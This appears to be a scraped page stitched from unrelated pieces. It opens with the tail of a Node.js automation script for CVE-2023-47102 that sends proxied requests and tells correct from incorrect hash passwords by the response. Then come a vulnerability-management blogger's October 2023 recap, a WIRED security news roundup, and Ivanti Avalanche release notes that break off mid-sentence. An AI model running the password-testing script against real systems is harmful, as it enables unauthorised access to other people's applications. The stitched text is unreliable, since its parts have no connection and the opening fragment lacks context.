                        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36",
                        "sec-ch-ua-platform": '"Windows"',
                        "Origin": "http://localhost:55414",
                        "Sec-Fetch-Site": "same-origin",
                        "Sec-Fetch-Mode": "cors",
                        "Sec-Fetch-Dest": "empty",
                        "Referer": "http://localhost:55414/",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                
                console.log(response2.data);
            }
        } catch (error) {
            console.error('An error occurred:', error);
        }
    };
    main();
    
                   
                

All requests made by the automation script.

An incorrect hash password will return a JSON with an error type of 2.

A correct hash password will return attributes of the settings, and the response length will be different.

CVE-2023-47102: Quantiano

Hello everyone! October was an interesting and busy month for me. I started a new job, worked on my open source Vulristics project, and analyzed vulnerabilities using it. Especially Linux vulnerabilities as part of my new Linux Patch Wednesday project. And, of course, analyzed Microsoft Patch Tuesday as well. In addition, at the end of […]

Hello everyone! October was an interesting and busy month for me. I started a new job, worked on my open source Vulristics project, and analyzed vulnerabilities using it. Especially Linux vulnerabilities as part of my new Linux Patch Wednesday project. And, of course, analyzed Microsoft Patch Tuesday as well. In addition, at the end of October I was a guest lecturer at MIPT/PhysTech university. But first thing first.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239138

On October 3, I joined the Positive Technologies team. There I will work on developing Vulnerability Management practices. I have already worked at PT for 6 years, from June 2009 to October 2015. And now, exactly 8 years later, I’m here again. I feel very pleasant emotions about this and have many plans. 🤩 I am sure that in the PT team I will be able to implement many cool things for the development of Vulnerability Management in Russia and abroad. 🙂

**Vulristics**

As for my open source Vulristics vulnerability prioritization project, I’ve made a few important updates.

**NVD Data Source**

I corrected the NVD data source, because NVD has become much less tolerant in the use of its API. After 5 consecutive requests, the API returns an error:

    
    <html><body><h1>403 Forbidden</h1>
    Request forbidden by administrative rules.
    </body></html>

Request forbidden by administrative rules.

According to the documentation:

> “The public rate limit (without an API key) is 5 requests in a rolling 30 second window; the rate limit with an API key is 50 requests in a rolling 30 second window”.

For Vulristics, I made support for authentication using the NVD API key and sleeps of 0.6 seconds when using the key and 6 seconds without using the key.

To obtain an NVD API key, you need to specify your organization, organization type, and email in the form. After a few seconds, you will receive a one-time link via email, which will give you the key.

I also started using the NVD API v2.0 in Vulristics, which allowed me to get CISA KEV data on vulnerabilities being exploited in the wild. I also take links to exploits from NVD (however, be careful, these links are not always good enough).

**Custom Data Source**

I added a custom data source to Vulristics. This is a small but quite useful improvement. Sometimes you know for sure that there is an exploit for a vulnerability or a sign of exploitation in the wild. But the sources that Vulristics supports do not contain this data. 🤷‍♂️ How to take into account such facts in a Vulristics report?

Vulristics now has a custom data source. It does not make any requests to external sources. It simply reads JSON files from the data/custom\_cve directory. You can add your JSON file for some CVE to this directory. And you can set the parameters in this file that you want to define for this CVE. You don’t have to set all the parameters. You can only set the ones you want. For example, only links to exploits.

Of course, you don’t have to do this manually. You can generate such files using a script based on the data you have. 😉

File example:

    {
      "description": "Remote Code Execution in Chromium",
      "cvss_base_score": 9.2,
      "wild_exploited": true,
      "wild_exploited_sources": [
        {"type": "ransomware_info_source", "text": "RansomwareINFO", "url": "https://www.some-site-about-ransomware-attacks.com/12345"}
      ],
      "public_exploit": true,
      "public_exploit_sources": [
        {"type": "exploit_info_source", "text": "ExploitINFO", "url": "https://www.some-site-about-exploits.com/12345"}
      ],
      "epss": 0.97434,
      "epss_percentile": 0.99924
    }

**Linux Patch Wednesday**

I launched my new project – Linux Patch Wednesday! 🚀🥳 For Microsoft products we have a single day of increased attention – Microsoft Patch Tuesday, and for Linux there is no such day. Everything is too fragmented there and patches are released literally every day. But what’s stopping us from independently generating a list of CVEs fixed during the month and highlighting critical issues? Let’s try!

If Microsoft Patch Tuesday occurs every second Tuesday of the month, then Linux Patch Wednesday will occur **every third Wednesday** of the month!

I analyzed the public OVAL content of 5 Linux distribution vendors and uploaded the resulting monthly Linux Patch Wednesday bullruetins to Github. From March 2007 to November 2023. I invite you to check it out and, if you like it, give it a star. 🙂⭐️

I analyzed first October Linux Patch Wednesday bulletin using Vulristics! 🥳

I’m pleased with the result. The top looks adequate and corresponds to what I highlighted in my Russian-language telegram channel avleonovrus and blog avleonov.ru.

1.  **Memory Corruption** – Chromium (CVE-2023-5217). This is a vulnerability in the libvpx library, which was the most critical in the October Microsoft Patch Tuesday. There is a PoC on Github and signs of exploitation in the wild.
2.  **Elevation of Privilege** **/ Remote Code Execution** – GNU C Library (CVE-2023-4911). This is Qualys Looney Tunables. There has been a PoC for this vulnerability for a long time, but there are no signs of exploitation in the wild yet.
3.  **Denial of Service** – Golang Go (CVE-2023-29409). There is a PoC. Vulristics detected the software as TLS, since there is no hint of Go in the description of the CVE vulnerability. 🤷‍♂️
4.  **Denial of Service** – HTTP/2 protocol (CVE-2023-44487). Will also be in MSPT.  
    …
5.  **Memory Corruption** – Curl (CVE-2023-38545). Not a very critical vulnerability, but PoCs have appeared for it on Github.

The rest of the vulnerabilities are without exploits or signs of exploitation in the wild.

Full Vulristics report: linux\_patch\_wednesday\_october2023

**Microsoft Patch Tuesday October 2023**

I also released the Vulristics report on October’s Microsoft Patch Tuesday.

What is in the TOP:

1.  **Memory Corruption** – Microsoft Edge (CVE-2023-5217). This is a vulnerability in the libvpx library, which is used to play video in VP8 format. As in the recent libwebp case, this vulnerability affects many software products, but primarily web browsers. There is no public exploit yet, but there are signs of exploitation in the wild.
2.  **Elevation of Privilege** – Skype for Business (CVE-2023-41763). In fact, this is an information disclosure vulnerability. An unauthenticated attacker may send a special request to a vulnerable Skype for Business server and this will lead to the disclosure of confidential information. Such information may be used to gain access to internal networks. 🤷‍♂️ There are signs of exploitation in the wild and there are no public exploits yet. Several RCEs have also been released for Skype for Business.
3.  **Information Disclosure** – Microsoft WordPad (CVE-2023-36563). Exploiting this vulnerability could allow the disclosure of NTLM hashes. An attacker must send the user a malicious file and convince him to open it. Or, if an attacker has access to the host, he himself can run a special program on the host with the same result. This looks dangerous. There are signs of exploitation in the wild and there are no public exploits yet.
4.  **Denial of Service** – HTTP/2 protocol (CVE-2023-44487). Microsoft has released fixes for IIS (HTTP.sys), .NET (Kestrel) and Windows against the new effective DDoS attack “HTTP/2 Rapid Reset”. The problem is universal. Amazon, Cloudflare and Google recently reported that they were attacked via “HTTP/2 Rapid Reset”. So there are signs of exploitation in the wild.

There were no more vulnerabilities in Patch Tuesday that showed signs of exploitation in the wild or had a publicly exploit. You can also pay attention to:

🔻 20 Microsoft Message Queuing vulnerabilities, including some **RCEs**.  
🔻 **Remote Code Execution** – Microsoft Exchange (CVE-2023-36778). “Successful exploitation requires that the attacker be on the same network as the Exchange Server host, and use valid credentials for an Exchange user in a PowerShell remoting session”. It doesn’t seem particularly critical, however “Exploitation More Likely.”  
🔻 **Elevation of Privilege** – Windows IIS Server (CVE-2023-36434). This is achieved through simplified password brute-force attack. 🤷‍♂️  
🔻 A pack of **Elevation of Privilege** vulnerabilities in Windows Win32k and Windows Graphics Component. Successful exploitation of the vulnerability may allow an attacker to gain SYSTEM privileges.

Full Vulristics report: ms\_patch\_tuesday\_october2023\_report

**Other Vulnerabilities**

And finally, let’s note other important vulnerabilities, which I also wrote about in October in Russian

1\. **Authentication Bypass / Privilege Escalation** – Cisco IOS XE (CVE-2023-20198)

2\. **Authentication** **Bypass** – Confluence (CVE-2023-22515)

3\. VMware vulnerabilities: **Remote code execution** – vCenter Server (CVE-2023-34048) and **Authentication Bypass** – Aria Operations for Logs (CVE-2023-34051).

4\. “Citrix Bleed“: **Information Disclosure** – NetScaler ADC/Citrix ADC and NetScaler Gateway (CVE-2023-4966)

5\. JetBrains: **Remote code execution** – TeamCity (CVE-2023-42793).

6\. Full disclosure for unfixed Squid vulnerabilities.

**VM Vendors news**

From VM vendor news, I would like to highlight the following.

Miercom released a report “Vulnerability Management Competitive Assessment“. They did the research at the request of Tenable, so there couldn’t be much intrigue about who among Tenable, Qualys and Rapid7 would win. 😏 Unlike similar marketing comparisons, Miercom decided not to ask customers of the vendors or compare on high-level features. They compared based on basic functionality, namely the completeness of the detection databases. It’s nice to know that I myself was involved in comparing CVE knowledge bases and identifying blind spots before it became mainstream. 😅

The guys from the Vulners team presented a new version of the automatic metric for assessing the criticality of vulnerabilities – AI Score v2. As the name implies, data processing there is carried out using machine learning, and specifically using the CatBoost library. Relationships between objects (there are more than 3 million objects in Vulners), CVSS Base Score values of ancestor objects, object type, text description of the object, etc. are analyzed. Give it a try, this feature is available for free to all Vulners users.

**PhysTech Lecture**

At the end of the month, I gave a lecture on Vulnerability Management at the Moscow PhysTech university. This is the second time, the first was 5 years ago. This time remotely.

On occasion, I updated my educational presentation. I separated 4 approximately equal parts:

🔹 Security Analysis – vulnerabilities and vulnerability detection  
🔹 Asset Management – getting rid of chaos in infrastructure  
🔹 Vulnerability Management – building a process with a focus on prioritizing vulnerabilities  
🔹 Patch Management – everything related to patching vulnerabilities and relationships with IT

I primarily reworked the Asset Management and Vulnerability Management parts. It seems that I managed to combine the effective safety approach (by Positive Technologies), the guidelines of regulators and my own considerations quite well. This presentation would be good for guest lectures, and it is clear how it could usefully be expanded to 4 separate lectures (or even more). I’m satisfied. 🙂

By the way, PhysTech is under sanctions of the EU, USA, UK, Japan, Switzerland and New Zealand. A decent place. 🙂👍

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

October 2023: back to Positive Technologies, Vulristics updates, Linux Patch Wednesday, Microsoft Patch Tuesday, PhysTech VM lecture

Plus: SolarWinds is charged with fraud, New Orleans police face recognition has flaws, and new details about Okta’s October data breach emerge.

As the Israel-Hamas war continues, with Israeli troops moving into the Gaza Strip and encircling Gaza City, one piece of technology is having an outsized impact on how we see and understand the war. Messaging app Telegram, which has a history of lax moderation, has been used by Hamas to share gruesome images and videos. The information has then spread to other social networks and millions more eyeballs. Sources tell WIRED that Telegram has been weaponized to spread horrific propaganda.

Microsoft has had a hard few months when it comes to the company’s own security, with Chinese-backed hackers stealing its cryptographic signing key, continued issues with Microsoft Exchange Servers, and its customers being impacted by failings. The company has now unveiled a plan to deal with the ever-growing range of threats. It’s the Secure Future Initiative, which plans, among multiple elements, to use AI-driven tools, improve its software development, and shorten its response time to vulnerabilities.

Also this week, we’ve looked at the privacy practices of Bluesky, Mastodon, and Meta’s Threads as all of the social media platforms jostle for space in a world where X, formerly known as Twitter, continues to implode. And things aren’t exactly great with this next generation of social media. With November arriving, we now have a detailed breakdown of the security vulnerabilities and patches issued last month. Microsoft, Google, Apple, and enterprise firms Cisco, VMWare, and Citrix all fixed major security flaws in October.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The Flipper Zero is a versatile hacking tool designed for security researchers. The pocket-size pen-testing device can intercept and replay all kinds of wireless signals—including NFC, infrared, RFID, Bluetooth, and Wi-Fi. That means it's possible to read microchips and inspect signals being admitted from devices. Slightly more nefariously, we've found it can easily clone building-entry cards and read credit card details through people's clothes.

Over the last few weeks, the Flipper Zero, which costs around $170, has been gaining some traction for its ability to disrupt iPhones, particularly by sending them into denial of service (DoS) loops. As Ars Technica reported this week, the Flipper Zero, with some custom firmware, is able to send “a constant stream of messages” asking iPhones to connect via Bluetooth devices such as an Apple TV or AirPods. The barrage of notifications, which is sent by a nearby Flipper Zero, can overwhelm an iPhone and make it virtually unusable.

“My phone was getting these pop-ups every few minutes, and then my phone would reboot,” security researcher Jeroen van der Ham told Ars about a DoS attack he experienced while commuting in the Netherlands. He later replicated the attack in a lab environment, while other security researchers have also demonstrated the spamming ability in recent weeks. In van der Ham’s tests, the attack only worked on devices running iOS 17—and at the moment, the only way to prevent the attack is by turning off Bluetooth.

In 2019, hackers linked to Russia’s intelligence service broke into the network of software firm SolarWinds, planting a backdoor and ultimately finding their way into thousands of systems. This week, the US Securities and Exchange Commission charged Tim Brown, the CISO of SolarWinds, and the company with fraud and “internal control failures.” The SEC alleges that Brown and the company overstated SolarWinds’ cybersecurity practices while “understating or failing to disclose known risks.” The SEC claims that SolarWinds knew of “specific deficiencies” in the company’s security practices and made public claims that weren’t reflected in its own internal assessments.

“Rather than address these vulnerabilities, SolarWinds and Brown engaged in a campaign to paint a false picture of the company’s cyber controls environment, thereby depriving investors of accurate material information,” Gurbir S. Grewal, director of the SEC’s Division of Enforcement said in a statement. In response, Sudhakar Ramakrishna, the CEO of SolarWinds, said in a blog post that the allegations are part of a “misguided and improper enforcement action.”

For years, researchers have shown that face recognition systems, trained on millions of pictures of people, can misidentify women and people of color at disproportionate rates. The systems have led to wrongful arrests. A new investigation from Politico, focusing on a year’s worth of face recognition requests made by police in New Orleans, has found that the technology was almost exclusively used to try to identify Black people. The system also “failed to identify suspects a majority of the time,” the report says. Analysis of 15 requests for the use of face recognition technology found that only one of them was for a white suspect, and in nine cases the technology failed to find a match. Three of the six matches were also incorrect. “The data has pretty much proven that \[anti-face-recognition\] advocates were mostly correct,” one city councilor said.

Identity management company Okta has revealed more details about an intrusion into its systems, which it first disclosed on October 20. The company said the attackers, who had accessed its customer support system, accessed files belonging to 134 customers. (In these instances, customers are individual companies that subscribe to Okta’s services). “Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks,” the company disclosed in a blog post. These session tokens were used to “hijack” the Okta sessions of five separate companies. 1Password, BeyondTrust, and Cloudflare have all previously disclosed they detected suspicious activity, but it is not clear who the two remaining companies are.

This Cheap Hacking Device Can Crash Your iPhone With Pop-Ups

Ivanti Avalanche Incorrect Default Permissions allows Local Privilege Escalation Vulnerability

Release Information: Product: AvalanchePremise\_6.4.1.236 Description: Avalanche Premise 6.4.1.236 for Windows Version: v6.4.1.236 Notes: Avalanche 6.4.1.236 Release What's New in This Version -------------------------- Security hardening fixes to for the following reported issues: CVE-2022-43554 ZDI-CAN-19502 CVE-2022-43555 ZDI-CAN-19503 CVE-2023-41725 ZDI-CAN-21006 CVE-2023-32567 ZDI-CAN-21030 CVE-2023-41726 ZDI-CAN-21231 Reported by Trend Micro's Zero Day Initiative \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.4.1 Description: Avalanche Premise 6.4.1 for Windows Version: v6.4.1.207 Notes: Avalanche 6.4.1 Release What's New in This Version -------------------------- Security hardening fixes to for the following reported issues: CVE-2023-32560 TRA-470 Reported by a researcher at Tenable CVE-2023-32561 ZDI-CAN-20904 CVE-2023-32562 ZDI-CAN-20991 CVE-2023-32563 ZDI-CAN-21081 CVE-2023-32564 ZDI-CAN-21002 CVE-2023-32565 ZDI-CAN-21004 CVE-2023-32566 ZDI-CAN-21005 Reported by Trend Micro's Zero Day Initiative \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.4.0 Description: Avalanche Premise 6.4.0 for Windows Version: v6.4.0.186 Notes: Avalanche 6.4.0 Release What's New in This Version -------------------------- New features and enhancements: -Added scheduled reboot functionality -Added reboot functionality to WindowsCE device details page for supported devices/enabler -Added scheduled and manual reboots to Audit Log -Android Client Admin password moved to Android Restriction Payload from SDS Profile -Update Play Store search results UI in AE software payload -Update Play Store search results UI in AE restrictions payload -Add major os version device property to Smartdevices (SDS Controlled) OsVer 9.1.2 => OsVerMajor 009 OsVer 11.3 => OsVerMajor 011 OsVer 13 => OsVerMajor 013 OsVer funkyformat => OsVerMajor 000 OsVer missing => OsVerMajor 000 -The default CFS/LFS port is changed to 9019 in the installer on a clean install to avoid possible conflict with neurons/cloud agent -Scan to Config Profile UI updated to modern design Deprecated features: -5.3 Migration support removed. To upgrade from 5.3, you first need to upgrade to 6.2 or 6.3 , then updgrade to 6.4.0 -GCM settings retired: Remove GCM configuration in SDS profile Remove GCM as option in Enrollment rules if a pre-existing enrollment rule from 6.3 or previous had GCM set as the notification type, it will get changed to ANS in 6.4 Security hardening: -InfoRail Router encryption enforcement -InfoRail Access control API key creation page in support and licensing page -InfoRail API key field added to remote dserver installers -InfoRail options screen added to Installer (clear existing keys, legacy access, legacy ACE access) -User password strength on user password creation/edit -Double password fields (enter/confirm) have been changed to a single password field with a toggle to view password on creation or edit -Passwords are no longer viewable after changes have been saved \*\*Password fields in legacy WIndowsCE profiles have not been changed Fixes: Defect: Clicking on smart device location history logout and exception error Defect: dserver Profiles not displayed in deployment dialog Defect: Avalanche inventory search bar fails to retrieve devices by serial number Defect: SDS not observing the check in time interval, always using 24hrs Fix to address ZDI-CAN-17729 Fix to address ZDI-CAN-17750 Fix to address ZDI-CAN-17769 Fix to address ZDI-CAN-17812 Fix to address ZDI-CAN-19513 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Product: AvalanchePremise\_6.3.4 Description: Avalanche Premise 6.3.4 for Windows Version: v6.3.4.153 Notes: Avalanche 6.3.4 Release What's New in This Version: Support for Battery Campaigns in Neurons Support for Device Actions in Neurons User Management: Neurons Access Token has been added to allow device commands to be sent from Neurons. Audit Log: Device commands sent from Neurons will be captured and filterable in the audit log. Fixes: Fix to address CVE-2021-44228 Fix to address CVE-2022-22965 Fix to address ZDI-CAN-15301 Fix to address ZDI-CAN-15328 Fix to address ZDI-CAN-15329 Fix to address ZDI-CAN-15330 Fix to address ZDI-CAN-15332 Fix to address ZDI-CAN-15333 Fix to address ZDI-CAN-15449 Fix to address ZDI-CAN-15493 Fix to address ZDI-CAN-15528 Fix to address ZDI-CAN-15919 Fix to address ZDI-CAN-15966 Fix to address ZDI-CAN-15967 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.3 Description: Avalanche Premise 6.3.3 for Windows Version: v6.3.3.101 Notes: Avalanche 6.3.3 Release What's New in This Version: User Management: Neurons Access Token has been added to allow device commands to be sent from Neurons. Audit Log: Device commands sent from Neurons will be captured and filterable in the audit log. Android Enterprise Restrictions Payload: Allow Developer Options to be enabled on the Android Enterprise devices in Fully Managed mode. Configuring Windows (AIDC) Software Packages: Single use password is now issued and required for launching configuration utilities with software packages. Device Details: Device actions are now enabled or disabled based on the reporting of the enabler capabilities property. Data Repository Service: The DRS has been removed. File and OS Update payloads that used DRS will need to be updated to use the Central FileStore. Component Updates: Updated to Java 15 Updated to Tomcat 9.0.56 Fixes: Fix to address Remote Control service startup error when port 80 is blocked. Fix to address CVE-2021-30497 Fix to address ZDI-CAN-14123 Fix to address ZDI-CAN-14187 Fix to address ZDI-CAN-14188 Fix to address ZDI-CAN-15130 Fix to address ZDI-CAN-15137 Fix to address ZDI-CAN-15168 Fix to address ZDI-CAN-15169 Fix to address ZDI-CAN-15200 Fix to address ZDI-CAN-15217 Fix to address ZDI-CAN-15251 \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.2 Description: Avalanche Premise 6.3.2 for Windows Version: v6.3.2.3490 Notes: Avalanche 6.3.2 Release What's New in This Version: Printer management. Discover printers in the warehouse and bring them under management with a streamlined, remote provisioning process. Once your printers are managed by Avalanche, push files and settings to them, receive real-time alerts from them, and view their status remotely. Velocity configuration manifests. Create Velocity manifests to distribute Velocity configuration files from the Central File Store to your Android Enterprise devices. NFC provisioning for Android Enterprise. Use NFC provisioning to send Wi-Fi and enrollment information from an enrolled fully managed Android Enterprise device to new devices. QR code provisioning for Android Enterprise. Use QR code provisioning to send Wi-Fi and enrollment information from an enrolled fully managed Android Enterprise device to new devices. Android Enterprise enabler customization. Use an Android Enterprise enabler customization payload to configure the appearance of the enabler. Credentials certificate payload for Android. Use credentials certificate payloads with Wi-Fi payloads to verify the user or server identity when connecting to enterprise networks with Android and Android Enterprise devices. Temporarily disable lock task mode. To ease troubleshooting, temporarily disable lock task mode on a device from the console or the enabler. Android Enterprise provisioning profile. Use Android Enterprise provisioning profiles to create provisioning QR codes. Scan a provisioning QR code to enroll new fully managed devices with a reduced amount of device interaction. Reboot Android devices from the Avalanche Console. Launch apps on install or reboot. When creating an Android Enterprise software payload, you can select to launch the app on install or reboot. This option is important for installing remote control software. Fixes: Fix: Removed drag and drop in the folder tree. Drag and drop will continue to function when applying Smart Device and Printer profiles. Fix: Custom property changes to an individual device in the device details will not update all devices that share the same custom property. \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.1 Description: Avalanche Premise 6.3.1 for Windows Version: v6.3.1.1507 Notes: Avalanche 6.3.1 Release New Features and Improvements: Android Enterprise Support \*Support for Fully Managed and Dedicated Device (Kiosk) modes \*File Payload \*Restriction Payload (Fully Managed and Dedicated Device modes) \*Disable factory reset from settings \*Remove factory reset protection data \*System Update Policy Payload (Fully Managed and Dedicated Device modes) \*Wi-Fi Payload \*Scan to enroll support using the device camera \*Factory reset wipe command can remove factory reset protection data and wipe the SD card. \*Log file retrieval from device \*New Android Enterprise Enabler https://play.google.com/store/apps/details?id=com.ivanti.enterprise UI performance and user experience \*Load time improvements for Inventory, Profiles, and Rugged Device Details pages \*Inventory page has been split to three tabs: Device Inventory, Server Inventory, and Mobile Device Groups \*Smart Device Payloads have been moved to their own tab \*All Smart Device Payloads have been redesigned from a dialog based UI to a modern page design \*Smart Device Profile has been redesigned from a dialog based UI to a modern page design Velocity config support added for both Android and Android Enterprise management Create scan to enroll QR codes directly from Enrollment Rules UserVoice for Avalanche link UTC data model for custom columns to allow timestamp to be displayed as date and time. Fixes: Fix: Custom properties can now be saved in network and scan to configure profiles. Fix: Scan to configure, custom properties, and registry keys can now be edited after creation. Fix: Certificate Manager improvements \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.3.0 Description: Avalanche Premise 6.3.0 for Windows Version: v6.3.0.555 Notes: Avalanche 6.3.0 Release New Features and Improvements: Android Enterprise Work Profile Support \*Create new or enroll an existing Google Play Android Enterprise account \*Support for multiple enterprise accounts \*Enrollment Rules reference Google Play Android Enterprise accounts \*Passcode settings support for both Device and Work Profile \*Support for Google Enterprise Play Store apps, including configuration \*Runtime Permissions settings for Apps (Account wide for Google Enterprise or granular per app settings) \*Lock, Unenroll, Delete Work Profile \*New Android Enterprise Enabler https://play.google.com/store/apps/details?id=com.ivanti.enterprise FCM Notification Service support Panasonic OS Updates APN Payload for Android License upgrade from 6.2 to 6.3 (requires a restart of the eserver) Subscription License support HTTP/HTTPS Webserver configuration added to install Prerequisite Software settings for Manifest URL Software Payloads Outgoing IP address of router is reported as IP address setting added to Smart Device Profile Removed: Compliance Payload (Compliance status is now based on Android Enterprise Passcode Compliance) Fixes: Fix: Improved CFS logging Fix: Certificate Manager settings on reboot Fix: CFS access token expiration extended Fix: Android App Name handling with special characters Fix: CFS access token renewal Fix: Reduction in SDS device sync time with selection criteria Fix: Accessing device details from search no longer causes an error Fix: AIDC software profile now shows correct package type \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.2.2 Description: Avalanche Premise 6.2.2 for Windows Version: v6.2.2.197 Notes: Avalanche 6.2.2 Release New Features and Improvements: License upgrade option added to the web console (6.2.2 Only) Removed: Removed support for Java 7, Java 8 is now required Fixes: Security Fixes for CVE-2018-8901 and CVE-2018-8902 Security Fixes for Remote Control Web UI including JQuery updates Fixes to Central File Store configuration page \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\* Release Information: Product: AvalanchePremise\_6.2.0 Description: Avalanche Premise 6.2.0 for Windows Version: v6.2.0.602 Notes: Avalanche 6.2.0 Release Key New/Changed features Overview: Enrollment Enrollment rules now determine whether the enabler will use ANS or GCM as the notification service on android. A new type of enrollment rule has been created called a reference Enrollment Rule (Global Enrollment Rule) has been added that allows rules to be added at regions and deployed to multiple SDservers. You may add a folder that will be created and deployed at the root of all SDservers below the rules region. Broadcast to enroll When a enroll.prf file has been placed on the device with ‘broadcast’ as the server address, it will now perform a UDP broadcast to find a listening SDServer on the same subnet. Multiple Smart Device Servers The SDS node has been altered to have a local Inforail, SDServer, ANServer and File Store. In order to allow this, a SDServer profile has been created. SDS Profile The settings for the central SDS have been moved from the system settings page into a new Smart Device Server Profile. These include: APNS Cert, Google GCM Info, HTTPS Cert, SDS Public Address, Automatic Smart Device Check In, Smart Device Client Administrator Password. SDS Profiles Inheritance has changed, they will aggregate settings instead of overwriting. This allows you to set things like APNS, 